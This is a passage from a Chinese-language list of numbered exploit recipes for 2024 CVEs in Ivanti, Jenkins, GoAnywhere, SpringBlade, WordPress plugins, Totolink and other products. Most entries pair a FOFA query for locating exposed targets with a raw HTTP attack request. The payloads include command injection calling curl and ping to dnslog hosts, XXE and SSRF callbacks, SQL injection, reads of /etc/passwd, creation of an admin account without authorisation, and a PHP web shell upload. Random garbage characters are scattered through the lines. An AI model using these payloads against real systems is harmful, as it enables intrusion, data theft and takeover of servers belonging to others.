% n2 x( p8 a0 A Q* s' ]0 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- [& M ^, v/ x4 u) k; H& {Connection: close
4 L) |* f `/ B% z: p0 ZContent-Length: 1218 [- R; g8 W6 f# G7 w W7 {
Accept: */*
' n) O+ ?% `* J7 x9 d# i' lAccept-Encoding: gzip, deflate
3 x$ E3 Y9 L6 g: e+ J% OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& [! S+ `& Z- O( E; H: DContent-Type: application/x-www-form-urlencoded; charset=UTF-8
$ n) a. C' h; ~X-Requested-With: XMLHttpRequest
2 P9 Z7 ~8 n. A' G
6 m$ M$ o8 T$ Y6 Q' g0 Bid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
: H. w$ d' p: U/ ]; W/ E" |8 |3 c2 t) d* ^6 t1 f; A7 R5 _) f
3 ^: ^* l# v8 I4 e( t8 M7 w
99. Ncast盈可视高清智能录播系统busiFacade RCE3 K& ]5 O$ `. ]6 k
CVE-2024-0305
$ O: x( L# f0 E m6 {; h8 M; b" D4 n/ YFOFA:app="Ncast-产品" && title=="高清智能录播系统"# z! o/ M9 V6 H" R, Q2 w
POST /classes/common/busiFacade.php HTTP/1.1
" m! f8 g6 Z7 I6 c8 K/ O5 QHost: 192.168.40.130:8080' H/ u7 x! i7 S" \4 a3 Z$ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 Y( e0 M; K5 P6 Y, R/ Q6 XConnection: close( S- p3 j5 }: n0 n2 ?
Content-Length: 154
) y' U3 b& ?1 C* J }Accept: */*/ g, d: E" e4 e3 g. H Q+ C1 M# j: {
Accept-Encoding: gzip, deflate
2 N; t2 m4 J5 T- a, T0 @# ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- X, g0 [ J6 T7 n" bContent-Type: application/x-www-form-urlencoded; charset=UTF-8
5 e* m) ~! Q+ I' f+ NX-Requested-With: XMLHttpRequest
$ ]( Z+ O8 f) C7 b- ?/ q1 f5 l) q/ X! z0 E# G8 c
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
7 o& Y$ O' d( [7 S% O3 n' x9 W1 P: ?+ ?6 @- {" A
6 Y) q# r% T6 r, x
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
7 l5 x8 ]. k8 {2 q2 z- l3 K# N/ |CVE-2024-0352; ~0 W1 ^, r8 c+ _' C5 P
FOFA:icon_hash="874152924"1 i* L- c( z+ }- Q/ [+ f3 o
POST /api/file/formimage HTTP/1.1
$ o+ w. b7 q m1 J6 ?Host: 192.168.40.1301 m/ h0 _' h' E$ @# H0 ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 H" {. U* E; c$ H( h7 EConnection: close# G1 R6 `% ]2 }$ S% o; u1 P* E
Content-Length: 201# z d5 G0 ^2 W' G# L5 f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
6 D F8 f- ]' y% B( FAccept-Encoding: gzip/ r& X! G! y/ J3 U: A2 M2 {
# Y% E8 \5 x" b5 ~" M
------WebKitFormBoundarygcflwtei, h% |/ v+ q4 ~0 @
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
' A$ J' d8 B9 ~( u# H5 Z8 Y& wContent-Type: application/x-php
) F3 N7 M- N/ h& ?: W7 i+ \! K
& k' L1 Q$ L, E; X6 c2ayyhRXiAsKXL8olvF5s4qqyI2O
6 A; `, l# F2 l. s& r7 t------WebKitFormBoundarygcflwtei--
0 Q% `' [; k& k) W
2 ~3 }. c$ a: E! h% F8 s
1 J2 ~1 n6 E( N: S7 x- W6 M! o( s101. ivanti policy secure-22.6命令注入
0 `5 O. V8 W5 W! s% zCVE-2024-218876 t9 g4 l- i" j, x0 ^
FOFA:body="welcome.cgi?p=logo" g1 j5 |/ V( |. Q' P3 H
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
2 \' ?+ H% B. Z, g. o: [! S$ e/ {Host: x.x.x.xx.x.x.x
, ~0 ]1 e$ X K, z# mUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ _* v v4 g( A
Connection: close% z+ d& Q7 C8 e$ c
Accept-Encoding: gzip
V/ z& \0 {# d( N/ f2 z" J0 D1 h% t2 C, _; D
' j* j1 r+ A9 F/ U% F. ]8 v
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行( E3 k% c" ^( B
CVE-2024-21893
: K& f- ?. U2 {. L+ H9 _) f) _FOFA:body="welcome.cgi?p=logo"7 d7 n) Z9 {5 ^; T4 `( C# u+ ~" G
POST /dana-ws/saml20.ws HTTP/1.1
3 s' x# w; j* ^" @9 n+ M \8 JHost: x.x.x.x
. {6 l3 L( |0 Q. M& jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% q/ @! R/ I% q' q3 ]$ J
Connection: close% Y3 }; j& ]1 G+ b- M3 r1 j( A
Content-Length: 792- X" h$ B' J9 V5 y
Accept-Encoding: gzip1 B# _ k- i# w' q# g* |# p! Q
" @# X! S& T1 `3 l<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
6 \2 H' s8 X4 p2 J+ Z1 d& b$ {' G$ X$ l# f( u& W7 B- e- V# I
103. Ivanti Pulse Connect Secure VPN XXE @, r9 ?' b' B# H& e% F
CVE-2024-22024
3 @$ W" u. t; a. d" h+ VFOFA:body="welcome.cgi?p=logo"" Y' o3 X) v# |8 W; n4 m
POST /dana-na/auth/saml-sso.cgi HTTP/1.1( H5 J( D, a5 j
Host: 192.168.40.130:1113 T9 W C& A) a" ?6 i0 Q8 J& J5 U. `7 V
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
* r! w, \7 `3 d) Q: i" AConnection: close9 T- S- o5 g. x
Content-Length: 204
# k0 n; ` C! L- @* ~+ |9 AContent-Type: application/x-www-form-urlencoded
% X4 Y6 d' t, j6 [; Y' l# ?4 wAccept-Encoding: gzip* G! A" D! H$ Q5 _7 L$ W
. Q: G- y) E4 Z% i! v; T. iSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
/ g- W4 R$ [5 U* I6 z
0 n7 `4 [! K+ m9 W) h+ Y9 G. u4 G2 c2 x( r N; ?+ D
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下3 M2 C! P( O9 f7 f9 f% M8 E
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>; k8 W8 P1 Z) V- E& t9 E
x# H! E( o0 S) L0 Q
" f4 B1 U' q8 _2 J' N% x6 l
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
" I) C% }4 U5 n* T: VCVE-2024-0569
6 x$ |8 ^/ Y- `, z4 S. C, m4 w4 ZFOFA:title="TOTOLINK", O; f9 I% e% L( {6 J
POST /cgi-bin/cstecgi.cgi HTTP/1.1
% T% F) b: t* V/ f5 V1 p/ VHost:192.168.0.1
+ P: f: W+ Q" M/ f+ k! ?! V2 }Content-Length:41
+ ?' F, ?3 q9 {) E6 Q+ G- p6 G! rAccept:application/json,text/javascript,*/*;q=0.01
* G: J, p# ^& K" aX-Requested-with: XMLHttpRequest3 k0 J/ T* x, ~8 S6 i! P
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
( U# O8 T% }, }Content-Type: application/x-www-form-urlencoded:charset=UTF-85 Q' L8 P: G* D- _3 w
Origin: http://192.168.0.1
+ U- T* |% S4 HReferer: http://192.168.0.1/advance/index.html?time=16711523805641 D# X. \& L# y; b$ J" E+ W4 K5 P
Accept-Encoding:gzip,deflate1 f3 g# C2 W( H% R! i
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
' L; b5 X# j1 L8 W6 x) H4 gConnection:close
: B" U9 y6 y0 @0 D& n7 U1 n+ u5 I+ u& o
{
6 l6 f k* N5 F% l"topicurl":"getSysStatusCfg",
& A5 u! \1 M }2 `"token":""2 y/ ?: L8 i6 w6 \( E# v( {3 }
}* \" C* F! {' O5 h, V, d
6 ]0 d( }. H# P1 l2 \
105. SpringBlade v3.2.0 export-user SQL 注入
3 b0 r5 }1 d- OFOFA:body="https://bladex.vip"0 z( O, V: D5 _& F7 u
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
: C7 Q. L6 W- _
3 v2 H! @% D& l X: N- s" R106. SpringBlade dict-biz/list SQL 注入
3 z- S+ T' u, ]5 D/ k" I' h; fFOFA:body="Saber 将不能正常工作"
- Z3 W( L( L# l6 `# p- fGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 P, }" H1 Y$ T/ JHost: your-ip g$ y5 l9 s0 \* D+ u( _/ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 a* b7 O$ M5 c. v* ZBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
o/ \* D: M: g1 w. }Accept-Encoding: gzip, deflate1 [' ?" I9 E3 }# Y; {
Accept-Language: zh-CN,zh;q=0.9; V& V" d/ p S# V: B, T& y
Connection: close
. w5 C& i* V9 m7 e; @' m- K7 ~1 c$ g) l+ `
1 }; A! A* g+ A( p6 k" T. w2 A- ^. A% j107. SpringBlade tenant/list SQL 注入
6 G# I- w3 y1 NFOFA:body="https://bladex.vip"' U) u- e& p) C! p- o% n
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 p. x0 D: p5 m7 _) qHost: your-ip
9 G+ a2 K: V: f5 b# I# }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. t5 C+ g8 n* g2 e! [/ T
Blade-Auth:替换为自己的5 N. a# F R4 D/ Q0 J& p; r( j
Connection: close& K' r, |3 w6 h1 Q/ Q/ r1 Q$ ~
9 Q0 ]5 } C: H3 k2 m8 x
) L$ [0 W0 ?4 j0 c4 x$ g) {
108. D-Tale 3.9.0 SSRF% ?6 E; B- L# I- C: X; i
CVE-2024-21642" I: A7 W" k5 x/ T
FOFA:"dtale/static/images/favicon.png"
5 \. l2 Z( H. L$ UGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
, e+ Q8 }) ?& p1 O) F2 ZHost: your-ip
+ V# R# _* }' C( s5 e9 S$ w0 O! PAccept: application/json, text/plain, */*
+ @4 C' W/ ~- C- A4 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# d, b9 E5 u! Y4 I2 C$ A
Accept-Encoding: gzip, deflate
9 q f$ ~7 `+ W" PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
( X" H2 s: F2 x/ Y' L: d# nConnection: close/ k' s) c8 R7 F# v3 m" M" v
/ b4 D( ~" E8 W- w
9 S* p. o5 X7 _$ u5 l+ I109. Jenkins CLI 任意文件读取: i1 N$ R& |% Q Y( d
CVE-2024-23897
" d% @- P8 d( `3 y) b: I0 t3 `5 e, vFOFA:header="X-Jenkins" r1 w/ H# W' @' t5 r
POST /cli?remoting=false HTTP/1.1
8 A( x* k% i' l) k6 P8 Z: UHost:6 b/ x+ \( J# J* t" j2 O2 B
Content-type: application/octet-stream
" ]" B: }" `0 V7 N; ASession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
& F! a5 A7 U) A- g5 vSide: upload
( ~: Z8 ?! X' M- {! x* Z0 X/ fConnection: keep-alive
l- ?' c6 v) C4 t. `2 I; j8 y4 xContent-Length: 163
" s* j& b3 W( z+ x" S7 t, d
3 F9 l5 e3 ]' i! E" L6 \b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'5 ~' H( j/ I& _
/ l8 D, J, z3 T1 D
# A; I/ O. Y8 o
POST /cli?remoting=false HTTP/1.1; @1 l* |# V- Q7 Z5 m5 {
Host:8 J9 |. m" D/ ~6 T- b' ~4 l% z
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92- W# v4 S* g* X: \2 [2 j8 @( o
download- N s& s% M2 l8 S
Content-Type: application/x-www-form-urlencoded) A4 L" M, t: W; B1 b6 u
Content-Length: 0
" P* c; e& `9 E1 \6 z" G+ Q
$ ^9 m6 p* H: J' W `( X8 f1 R; ^4 \& n$ O6 L; R" _ z
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin4 `- U2 f o, ^* l' J/ N
java -jar jenkins-cli.jar help
j$ ?9 s" E+ j* f[COMMAND]
; s S7 w% f+ a" J3 p( |Lists all the available commands or a detailed description of single command.7 J+ R: C6 v# i8 f
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
0 d j- a- t) o4 X( H* _5 R9 U( @2 ] T3 p# g
3 s9 B1 a& |! H/ |" y
110. Goanywhere MFT 未授权创建管理员4 R; q: o% {1 n- D. E
CVE-2024-0204" b; P4 H. P$ s$ G& v+ N- D$ _( ?
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
4 _* X3 z6 g# G. v3 sGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1- J' ~4 U$ T- Y8 s+ v* D5 n
Host: 192.168.40.130:8000
$ ?3 E/ t( e- {6 W4 P. CUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.367 e. p& w' A$ U& O' }) b
Connection: close: H" d( ?, I8 l7 Z
Accept: */*3 K. O, C4 d# L6 Q K2 u1 [( V
Accept-Language: en, U8 t! ?" k* m" ?
Accept-Encoding: gzip7 a9 a) m3 z6 d3 F4 ^' D
) v2 a6 z# s8 L8 _& {) g8 w9 b3 o" S( }0 D8 H- ^
111. WordPress Plugin HTML5 Video Player SQL注入4 q" j! b; L4 F# h! E# u
CVE-2024-1061% K5 S3 {7 j! W( w# D% T/ D, s
FOFA:"wordpress" && body="html5-video-player"
2 r" H4 ?1 ]( l0 z0 OGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
v8 ?5 E. J, }; zHost: 192.168.40.130:1127 X! I% W4 [- B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! ?) N l# _1 a
Connection: close
E. t4 x' T6 P8 r5 W* t. m9 a. u f. s; ]Accept: */*
& g6 t- p' h; EAccept-Language: en S b; V0 x7 p( Y8 }2 r
Accept-Encoding: gzip7 c- Z' L8 d3 v3 i2 Z
6 c" ^, m3 p5 j e$ M/ r q
; W+ O* k; l' f3 v112. WordPress Plugin NotificationX SQL 注入
$ B* G Q0 C1 r! _CVE-2024-1698
D* g' W I( t2 }1 rFOFA:body="/wp-content/plugins/notificationx"
' A8 w; B! O+ W( \7 _) ePOST /wp-json/notificationx/v1/analytics HTTP/1.13 i. D4 f( W4 ~6 p! `
Host: {{Hostname}}
, I! X0 Z3 S( F+ n2 D/ CContent-Type: application/json
1 R8 x4 ^+ C" d9 T2 {+ t6 ^8 X* B
6 [6 K. z$ P% [# ~{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
, \* {4 h( T. h( s- ?. P
" l! K& ]7 R! {0 j+ ]9 J3 [! v# B9 s8 Q3 g4 z
113. WordPress Automatic 插件任意文件下载和SSRF7 b; [: `' x4 r2 j1 d2 I6 {
CVE-2024-27954
9 m& C# k( R F- ?& HFOFA:"/wp-content/plugins/wp-automatic", |. v7 a, r; U, G7 B& K$ |
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1/ n2 X/ m6 [5 l" l4 {5 @, z
Host: x.x.x.x
( r( A& }# W! G% ]User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! b' t. a4 H$ s0 eConnection: close# q& L- R5 I. d. F* S! ~+ B2 Y' k: B
Accept: */*
2 V$ e4 e# Q& F& {; H0 M8 X5 b3 A, hAccept-Language: en
( p m2 n( o4 Q" R+ [6 j) U* N5 T& V2 ^Accept-Encoding: gzip
: q, E; A! u4 t+ W B; u# H* V0 i+ q4 G0 ~( \/ M) G( p
F- e8 q6 @ }4 {1 m9 v$ \3 n/ u
114. WordPress MasterStudy LMS插件 SQL注入) v, n1 y- S9 ?, R; l, {1 I2 e: W
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
+ u2 N [8 w* A+ M8 G# H2 SGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.16 u3 Y+ h4 e5 j
Host: your-ip
7 E$ G0 n/ V6 KUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
# v) L5 S* @7 I* j6 i9 HAccept-Charset: utf-8
: {& T8 C9 J) B0 H* A' lAccept-Encoding: gzip, deflate. d( r. B `% G" ^
Connection: close& {: U6 R9 G8 H4 M/ j1 W
+ F8 e0 I7 v9 }" o; i! T/ b
; D4 u. A( R5 O. D& m; i
115. WordPress Bricks Builder <= 1.9.6 RCE
9 M6 P5 O T' R. [CVE-2024-25600# H8 }* `2 w+ X8 ]# h
FOFA: body="/wp-content/themes/bricks/"4 j6 l- y( E( e \
第一步,获取网站的nonce值
j/ x2 M" u/ N- ?4 VGET / HTTP/1.1
( V# k9 l' q% m# U- O' s. ~& nHost: x.x.x.x( |8 @' k1 p4 b; A
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.367 D% [6 f& d7 }/ O4 F
Connection: close9 O7 h `- \0 ~9 V q
Accept-Encoding: gzip6 p* a G+ U0 s) I% }6 U
/ P+ e z1 w' ~: E( V0 o q
- `0 o, E/ X) Q5 r" Z7 q9 W
第二步替换nonce值,执行命令8 G2 I3 M! ]! g; E5 H! ^
POST /wp-json/bricks/v1/render_element HTTP/1.1
2 }$ h L- s8 S' D2 qHost: x.x.x.x2 |) C. M+ b# H! U* n$ n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
{! G: w0 F$ v* ?0 ^: |8 o/ zConnection: close5 p H2 i9 ~( d0 e9 _
Content-Length: 356* M4 W* s5 l% [5 l: i- e; C2 j( ?
Content-Type: application/json K9 g! e. w: ?, L0 r( p* Q$ R
Accept-Encoding: gzip! d& @4 d$ r/ T; h# B3 G
1 n0 m7 b/ J( }1 P+ U3 Z2 B{
- [* f2 W1 e' W; K5 v+ `9 b"postId": "1",9 p: s% S. }0 j6 t$ W Y% X9 z
"nonce": "第一步获得的值",; C, M; ]' p( q& }; ]7 X
"element": {
) h' o& |, F/ q0 h, y ` "name": "container",
1 h1 e% j' ~+ V- [# u "settings": {& K( ?2 x5 }" o
"hasLoop": "true",
0 C# ? O( |& Q x "query": {. Q* X0 ~8 U$ G$ M# u2 M
"useQueryEditor": true,! s- @! _: R! Q' @8 b' A* C
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",. E- _: f. S1 s: a4 m
"objectType": "post"4 j2 c! P8 B& F. s- c T
}
# ~5 W, I/ B$ e( ?% v }
5 v+ [/ Z" r; [2 _) t }% k8 i. _7 ^3 E9 g( \% ~# V
}
' F, J7 [( U2 o5 d- ^7 B; r
$ u) v7 ~4 ^& f( q9 E2 t8 f# L9 U0 X, F2 G1 B7 _% u$ y( F/ v1 r
116. wordpress js-support-ticket文件上传
4 R: F" G4 Q, W: s# f4 v$ T% N, lFOFA:body="wp-content/plugins/js-support-ticket"
7 {. r3 E0 t& Z7 [: M# z* \" BPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1& ?0 _5 T3 M: ~; d" b
Host:
1 S9 c5 \- T! `9 MContent-Type: multipart/form-data; boundary=--------767099171
- ]! Z3 k( U4 p$ Y7 H8 dUser-Agent: Mozilla/5.0
5 h8 k) }3 m% }3 K8 l
\2 h8 n: U7 U----------767099171, z; ~- i- O1 a! d3 B3 o
Content-Disposition: form-data; name="action"
$ ~" }7 K( ^) ^9 d8 \configuration_saveconfiguration# w' }& |3 f9 e- |2 o: q: }
----------767099171% C0 m8 T3 D/ _" t( T
Content-Disposition: form-data; name="form_request"$ Y% ?4 N3 W+ D
jssupportticket
9 \8 s ]( j% p- R7 x# |----------767099171
( H. X- f' y1 eContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
$ f) |+ H/ ~ U7 N* S4 i0 UContent-Type: image/png1 n" c0 l9 R5 \$ M2 D5 {, @
----------767099171--
0 H8 \9 \, u3 U7 \ X e3 i0 [
. E: Q/ d8 x1 l7 X" N: O9 k3 q% b+ ~) U2 U% J5 H3 \
117. WordPress LayerSlider插件SQL注入
4 R# V+ b+ G [' iversion:7.9.11 – 7.10.0( e/ h) k2 x! Z8 g$ f b* `& P
FOFA:body="/wp-content/plugins/LayerSlider/"
% ]' s% H- T6 y: LGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1+ h9 g- \( f$ z& M0 ?0 X
Host: your-ip0 q: y8 G) A: p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 G5 I: |# A8 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- C, v& }& G/ q( d: EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, d9 N; @. q0 zAccept-Encoding: gzip, deflate, br
! Z" T) L9 T% v5 D$ Y: f0 f: QConnection: close
1 Z" n! m d2 q# A8 @Upgrade-Insecure-Requests: 1* L4 G4 K5 s; i4 P
, O/ G+ J: d# q+ l: e8 O3 k
$ J+ _! @! i- [4 w+ F, @% Z118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
6 z/ x! T. K5 r* C0 qCVE-2024-0939
5 V6 X3 K1 o W3 u- C0 Z0 y" {FOFA:title="Smart管理平台"
# G+ T, z* v' i5 I p4 kPOST /Tool/uploadfile.php? HTTP/1.1
9 n# Z1 `9 H# E" D( c% OHost: 192.168.40.130:8443
5 z; Z0 z; f% @8 M, zCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f84 {5 L! X/ O! H2 E4 j) t" ~+ K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" Q, u: Z1 g0 M: b( n/ [; Y) C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' v7 u# c( Q$ B7 I3 q5 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& o( Q8 E" K5 M1 X9 w/ e0 w3 SAccept-Encoding: gzip, deflate* T7 {. y. @' b: s, L/ u4 `
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887% U/ N9 Y0 s) G4 U$ S# _
Content-Length: 405; Q/ Q! E: x7 L, [" N
Origin: https://192.168.40.130:84433 [+ l P- Y c" a$ i R3 G1 f2 U
Referer: https://192.168.40.130:8443/Tool/uploadfile.php! ?* w5 t3 R3 Q/ K
Upgrade-Insecure-Requests: 1& r' G! _$ R# r
Sec-Fetch-Dest: document
. e4 K3 o. J. b dSec-Fetch-Mode: navigate5 t2 X" E V, g# w
Sec-Fetch-Site: same-origin
# ?) t6 Y* A3 _1 ?Sec-Fetch-User: ?1
% m Z. `# Q* t8 A9 j4 @Te: trailers& V8 E: i5 b. Y2 E }. f g
Connection: close
. W# j: M5 W5 S
' [2 ?& Q2 R0 ?0 `-----------------------------13979701222747646634037182887. H1 A; r. x( a8 ]' n
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
- y6 `8 Z; u/ d% A3 `& y9 }Content-Type: application/octet-stream
* {( f2 W0 X3 V, a1 a. c
; y- Z0 M/ n0 D( K' v" }<?php
{) |0 I5 k9 E/ jsystem($_POST["passwd"]);9 w( N- [1 t+ h5 ]0 V
?>
0 n1 u2 V% G+ d; g7 [-----------------------------13979701222747646634037182887: ~4 K- r9 Z `( h& R' T) t
Content-Disposition: form-data; name="txt_path"
7 \! K4 b+ w$ ]1 J0 p. S* K) T4 Z
- m' }+ _5 l- M) X: |, j6 p/home/src.php6 Y0 j) ^5 h3 ^! i/ c5 G' x* I- y
-----------------------------13979701222747646634037182887--2 I0 v) b* s1 a4 B( `2 T& w
# ^0 o1 `& d4 B. a
! a( [- o( K6 H+ \5 J$ ?) Y访问/home/src.php
4 b) F) z$ n- ?2 R6 u7 d n" e. S1 F+ K, Y2 A: B; P0 W! k
119. 北京百绰智能S20后台sysmanageajax.php sql注入
* F! t/ ^/ F$ y. |* w3 a+ tCVE-2024-1254 l& s2 F! C) w- Q `
FOFA:title="Smart管理平台"* H6 d# @( O- f: n& J; X2 [! Q
先登录进入系统,默认账号密码为admin/admin1 F) @& T& c1 P, e) x9 a0 a' d" v J
POST /sysmanage/sysmanageajax.php HTTP/1.113 [3 W5 E& p" p' S6 C
Host: x.x.x.x% r+ a G y; R8 |1 r5 J& t& w
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee+ |$ J) c# B2 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
" e( P" i5 T/ J$ Y4 X' k( kAccept: */*/ M2 b z% Q9 o& h5 F" k( ]+ c- w8 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 r- F% B& m$ k# FAccept-Encoding: gzip, deflate
